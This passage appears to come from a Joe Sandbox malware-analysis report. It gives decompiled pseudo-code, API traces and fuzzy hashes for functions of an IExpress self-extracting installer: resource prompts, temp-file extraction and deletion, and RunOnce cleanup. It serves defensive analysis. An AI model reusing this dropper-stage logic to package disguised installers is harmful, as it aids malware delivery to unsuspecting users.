                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 010E405C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 010E409C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 010E40A8
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010E40DC
                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010E40E9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3183975587-0
                                                                                                                                                                                                                                                • Opcode ID: a339ef117bee2d34e4715199f0b2a0a299b5ab62e34ce1b4857dab86e35af7b4
                                                                                                                                                                                                                                                • Instruction ID: c9a7ca6f3d69e3b098b3ddce46bad10dbc1a1961632d82b46650e771452c72f0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a339ef117bee2d34e4715199f0b2a0a299b5ab62e34ce1b4857dab86e35af7b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3319E31640208AFEB709B67DC4CFAB7BF8EBD8B10F1001A9F685D6191C63688858B50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 652 10e51e5-10e520b call 10e468f LocalAlloc 655 10e522d-10e523c call 10e468f 652->655 656 10e520d-10e5228 call 10e44b9 call 10e6285 652->656 661 10e523e-10e5260 call 10e44b9 LocalFree 655->661 662 10e5262-10e5270 lstrcmpA 655->662 671 10e52b0 656->671 661->671 665 10e527e-10e529c call 10e44b9 LocalFree 662->665 666 10e5272-10e5273 LocalFree 662->666 674 10e529e-10e52a4 665->674 675 10e52a6 665->675 669 10e5279-10e527c 666->669 672 10e52b2-10e52b5 669->672 671->672 674->669 675->671
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E51E5(void* __eflags) {
                                                                                                                                                                                                                                                				int _t5;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				void* _t28;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t1 = E010E468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                                				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                                					if(E010E468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                                						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                                						if(_t5 != 0) {
                                                                                                                                                                                                                                                							_t6 = E010E44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                                							LocalFree(_t28);
                                                                                                                                                                                                                                                							if(_t6 != 6) {
                                                                                                                                                                                                                                                								 *0x10e9124 = 0x800704c7;
                                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                                								return 0;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							 *0x10e9124 = 0;
                                                                                                                                                                                                                                                							L6:
                                                                                                                                                                                                                                                							return 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						LocalFree(_t28);
                                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					LocalFree(_t28);
                                                                                                                                                                                                                                                					 *0x10e9124 = 0x80070714;
                                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                				 *0x10e9124 = E010E6285();
                                                                                                                                                                                                                                                				goto L10;
                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                0x010e5273
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5273
                                                                                                                                                                                                                                                0x010e524a
                                                                                                                                                                                                                                                0x010e5250
                                                                                                                                                                                                                                                0x010e5256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5256
                                                                                                                                                                                                                                                0x010e5219
                                                                                                                                                                                                                                                0x010e5223
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F4D,?,00000002,00000000), ref: 010E5201
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010E5250
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                  • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                                • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                                • Opcode ID: 9669a2a982c3f5bb1b1a974f5824fd3355ae463faeaf561fa05f313489acdecc
                                                                                                                                                                                                                                                • Instruction ID: 2ef279feae4561338a3073a1ec9ca435e35867b0030113018d811bd1d303ef90
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9669a2a982c3f5bb1b1a974f5824fd3355ae463faeaf561fa05f313489acdecc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B11B6B5700201EFD3756B779C4CB7B65DDEB8DB98B00486DB6C2DA284DA7ECC014224
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                                			E010E52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                                				CHAR** _t31;
                                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t28 = __edi;
                                                                                                                                                                                                                                                				_t22 = __ecx;
                                                                                                                                                                                                                                                				_t21 = __ebx;
                                                                                                                                                                                                                                                				_t9 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                                				_push(__esi);
                                                                                                                                                                                                                                                				_t31 =  *0x10e91e0; // 0xdb8f30
                                                                                                                                                                                                                                                				if(_t31 != 0) {
                                                                                                                                                                                                                                                					_push(__edi);
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						_t29 = _t31;
                                                                                                                                                                                                                                                						if( *0x10e8a24 == 0 &&  *0x10e9a30 == 0) {
                                                                                                                                                                                                                                                							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                                							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t31 = _t31[1];
                                                                                                                                                                                                                                                						LocalFree( *_t29);
                                                                                                                                                                                                                                                						LocalFree(_t29);
                                                                                                                                                                                                                                                					} while (_t31 != 0);
                                                                                                                                                                                                                                                					_pop(_t28);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t11 =  *0x10e8a20; // 0x0
                                                                                                                                                                                                                                                				_pop(_t32);
                                                                                                                                                                                                                                                				if(_t11 != 0 &&  *0x10e8a24 == 0 &&  *0x10e9a30 == 0) {
                                                                                                                                                                                                                                                					_push(_t22);
                                                                                                                                                                                                                                                					E010E1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                                                                					if(( *0x10e9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                                						E010E65E8( &_v268);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                                					_t22 =  &_v268;
                                                                                                                                                                                                                                                					E010E2390( &_v268);
                                                                                                                                                                                                                                                					_t11 =  *0x10e8a20; // 0x0
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if( *0x10e9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                                					_t11 = E010E1FE1(_t22); // executed
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				 *0x10e8a20 =  *0x10e8a20 & 0x00000000;
                                                                                                                                                                                                                                                				return E010E6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                0x010e5317
                                                                                                                                                                                                                                                0x010e531c
                                                                                                                                                                                                                                                0x010e531f
                                                                                                                                                                                                                                                0x010e5333
                                                                                                                                                                                                                                                0x010e5345
                                                                                                                                                                                                                                                0x010e5351
                                                                                                                                                                                                                                                0x010e5359
                                                                                                                                                                                                                                                0x010e5359
                                                                                                                                                                                                                                                0x010e5363
                                                                                                                                                                                                                                                0x010e5369
                                                                                                                                                                                                                                                0x010e536f
                                                                                                                                                                                                                                                0x010e5374
                                                                                                                                                                                                                                                0x010e5374
                                                                                                                                                                                                                                                0x010e5381
                                                                                                                                                                                                                                                0x010e5387
                                                                                                                                                                                                                                                0x010e5387
                                                                                                                                                                                                                                                0x010e538f
                                                                                                                                                                                                                                                0x010e53a0

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(00DB8F30,00000080,?,00000000), ref: 010E52F2
                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(00DB8F30), ref: 010E52FA
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00DB8F30,?,00000000), ref: 010E5305
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00DB8F30), ref: 010E530C
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(010E11FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E5363
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010E5334
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                                • API String ID: 2833751637-256195474
                                                                                                                                                                                                                                                • Opcode ID: 96b203831fb1960b7202a10014b8f0346ef4fc179f17a927333348c2a2913e9e
                                                                                                                                                                                                                                                • Instruction ID: 518f765314901b669bb77b40eb445f9db83545d19d8411b4a860956d17957d86
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96b203831fb1960b7202a10014b8f0346ef4fc179f17a927333348c2a2913e9e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3721C635600214DFEB719B27ED0C7697BF4BB14B18F08859EF9C15B198CBBA9984CB80
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E1FE1(void* __ecx) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				if( *0x10e8530 != 0) {
                                                                                                                                                                                                                                                					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                                					if(_t4 == 0) {
                                                                                                                                                                                                                                                						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
                                                                                                                                                                                                                                                						return RegCloseKey(_v8);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t4;
                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,010E538C,?,?,010E538C), ref: 010E2005
                                                                                                                                                                                                                                                • RegDeleteValueA.KERNELBASE(010E538C,wextract_cleanup3,?,?,010E538C), ref: 010E2017
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(010E538C,?,?,010E538C), ref: 010E2020
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
                                                                                                                                                                                                                                                • API String ID: 849931509-2968168367
                                                                                                                                                                                                                                                • Opcode ID: f2616b52fe28089c11bf884faa9ea05e27ac0eee436b6c963d611922a019bb27
                                                                                                                                                                                                                                                • Instruction ID: 3330ef93976aacdf2493b695b039fd2637ca96a8db1002e202aeabf09e7184da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2616b52fe28089c11bf884faa9ea05e27ac0eee436b6c963d611922a019bb27
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7E04831650314FFD7319A93EC4EF597FEDE704B80F100195B98465056D7665A14D704
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E010E4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				long _t32;
                                                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                                                				long _t35;
                                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                                				struct HWND__* _t37;
                                                                                                                                                                                                                                                				long _t38;
                                                                                                                                                                                                                                                				long _t39;
                                                                                                                                                                                                                                                				long _t41;
                                                                                                                                                                                                                                                				long _t44;
                                                                                                                                                                                                                                                				long _t45;
                                                                                                                                                                                                                                                				long _t46;
                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                				long _t51;
                                                                                                                                                                                                                                                				char* _t58;
                                                                                                                                                                                                                                                				long _t59;
                                                                                                                                                                                                                                                				char* _t63;
                                                                                                                                                                                                                                                				long _t64;
                                                                                                                                                                                                                                                				CHAR* _t71;
                                                                                                                                                                                                                                                				CHAR* _t74;
                                                                                                                                                                                                                                                				int _t75;
                                                                                                                                                                                                                                                				signed int _t76;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t69 = __edx;
                                                                                                                                                                                                                                                				_t29 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                                				_v8 = _t30;
                                                                                                                                                                                                                                                				_t75 = _a8;
                                                                                                                                                                                                                                                				if( *0x10e91d8 == 0) {
                                                                                                                                                                                                                                                					_t32 = _a4;
                                                                                                                                                                                                                                                					__eflags = _t32;
                                                                                                                                                                                                                                                					if(_t32 == 0) {
                                                                                                                                                                                                                                                						_t33 = E010E4E99(_t75);
                                                                                                                                                                                                                                                						L35:
                                                                                                                                                                                                                                                						return E010E6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t35 = _t32 - 1;
                                                                                                                                                                                                                                                					__eflags = _t35;
                                                                                                                                                                                                                                                					if(_t35 == 0) {
                                                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                                                						_t33 = 0;
                                                                                                                                                                                                                                                						goto L35;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t36 = _t35 - 1;
                                                                                                                                                                                                                                                					__eflags = _t36;
                                                                                                                                                                                                                                                					if(_t36 == 0) {
                                                                                                                                                                                                                                                						_t37 =  *0x10e8584; // 0x0
                                                                                                                                                                                                                                                						__eflags = _t37;
                                                                                                                                                                                                                                                						if(_t37 != 0) {
                                                                                                                                                                                                                                                							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t54 = 0x10e91e4;
                                                                                                                                                                                                                                                						_t58 = 0x10e91e4;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t38 =  *_t58;
                                                                                                                                                                                                                                                							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                                							__eflags = _t38;
                                                                                                                                                                                                                                                						} while (_t38 != 0);
                                                                                                                                                                                                                                                						_t59 = _t58 - 0x10e91e5;
                                                                                                                                                                                                                                                						__eflags = _t59;
                                                                                                                                                                                                                                                						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                                						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t39 =  *_t71;
                                                                                                                                                                                                                                                							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                                							__eflags = _t39;
                                                                                                                                                                                                                                                						} while (_t39 != 0);
                                                                                                                                                                                                                                                						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                                						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                                						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                                						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                                							L3:
                                                                                                                                                                                                                                                							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                                							goto L35;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t69 = 0x10e91e4;
                                                                                                                                                                                                                                                						_t30 = E010E4702( &_v268, 0x10e91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                                						__eflags = _t30;
                                                                                                                                                                                                                                                						if(__eflags == 0) {
                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t41 = E010E476D( &_v268, __eflags);
                                                                                                                                                                                                                                                						__eflags = _t41;
                                                                                                                                                                                                                                                						if(_t41 == 0) {
                                                                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_push(0x180);
                                                                                                                                                                                                                                                						_t30 = E010E4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                                						_t75 = _t30;
                                                                                                                                                                                                                                                						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                                						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t30 = E010E47E0( &_v268);
                                                                                                                                                                                                                                                						__eflags = _t30;
                                                                                                                                                                                                                                                						if(_t30 == 0) {
                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						 *0x10e93f4 =  *0x10e93f4 + 1;
                                                                                                                                                                                                                                                						_t33 = _t75;
                                                                                                                                                                                                                                                						goto L35;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t44 = _t36 - 1;
                                                                                                                                                                                                                                                					__eflags = _t44;
                                                                                                                                                                                                                                                					if(_t44 == 0) {
                                                                                                                                                                                                                                                						_t54 = 0x10e91e4;
                                                                                                                                                                                                                                                						_t63 = 0x10e91e4;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t45 =  *_t63;
                                                                                                                                                                                                                                                							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                                							__eflags = _t45;
                                                                                                                                                                                                                                                						} while (_t45 != 0);
                                                                                                                                                                                                                                                						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                                						_t64 = _t63 - 0x10e91e5;
                                                                                                                                                                                                                                                						__eflags = _t64;
                                                                                                                                                                                                                                                						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t46 =  *_t74;
                                                                                                                                                                                                                                                							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                                							__eflags = _t46;
                                                                                                                                                                                                                                                						} while (_t46 != 0);
                                                                                                                                                                                                                                                						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                                						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                                						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                                						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t69 = 0x10e91e4;
                                                                                                                                                                                                                                                						_t30 = E010E4702( &_v268, 0x10e91e4,  *(_t75 + 4));
                                                                                                                                                                                                                                                						__eflags = _t30;
                                                                                                                                                                                                                                                						if(_t30 == 0) {
                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                                						_t30 = E010E4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                                						__eflags = _t30;
                                                                                                                                                                                                                                                						if(_t30 == 0) {
                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						E010E4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                                						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                                						__eflags = _t50;
                                                                                                                                                                                                                                                						if(_t50 != 0) {
                                                                                                                                                                                                                                                							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                                							__eflags = _t51;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t51 = 0x80;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                                						__eflags = _t30;
                                                                                                                                                                                                                                                						if(_t30 == 0) {
                                                                                                                                                                                                                                                							goto L3;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t33 = 1;
                                                                                                                                                                                                                                                							goto L35;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_t30 = _t44 - 1;
                                                                                                                                                                                                                                                					__eflags = _t30;
                                                                                                                                                                                                                                                					if(_t30 == 0) {
                                                                                                                                                                                                                                                						goto L3;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if(_a4 == 3) {
                                                                                                                                                                                                                                                					_t30 = E010E4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				goto L3;
                                                                                                                                                                                                                                                			}































                                                                                                                                                                                                                                                0x010e4d56
                                                                                                                                                                                                                                                0x010e4d5b
                                                                                                                                                                                                                                                0x010e4d5d
                                                                                                                                                                                                                                                0x010e4d62
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4d67
                                                                                                                                                                                                                                                0x010e4d6f
                                                                                                                                                                                                                                                0x010e4d74
                                                                                                                                                                                                                                                0x010e4d76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4d7c
                                                                                                                                                                                                                                                0x010e4d84
                                                                                                                                                                                                                                                0x010e4d89
                                                                                                                                                                                                                                                0x010e4d8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4d94
                                                                                                                                                                                                                                                0x010e4d99
                                                                                                                                                                                                                                                0x010e4d9e
                                                                                                                                                                                                                                                0x010e4da1
                                                                                                                                                                                                                                                0x010e4daa
                                                                                                                                                                                                                                                0x010e4daa
                                                                                                                                                                                                                                                0x010e4da3
                                                                                                                                                                                                                                                0x010e4da3
                                                                                                                                                                                                                                                0x010e4da3
                                                                                                                                                                                                                                                0x010e4db5
                                                                                                                                                                                                                                                0x010e4dbb
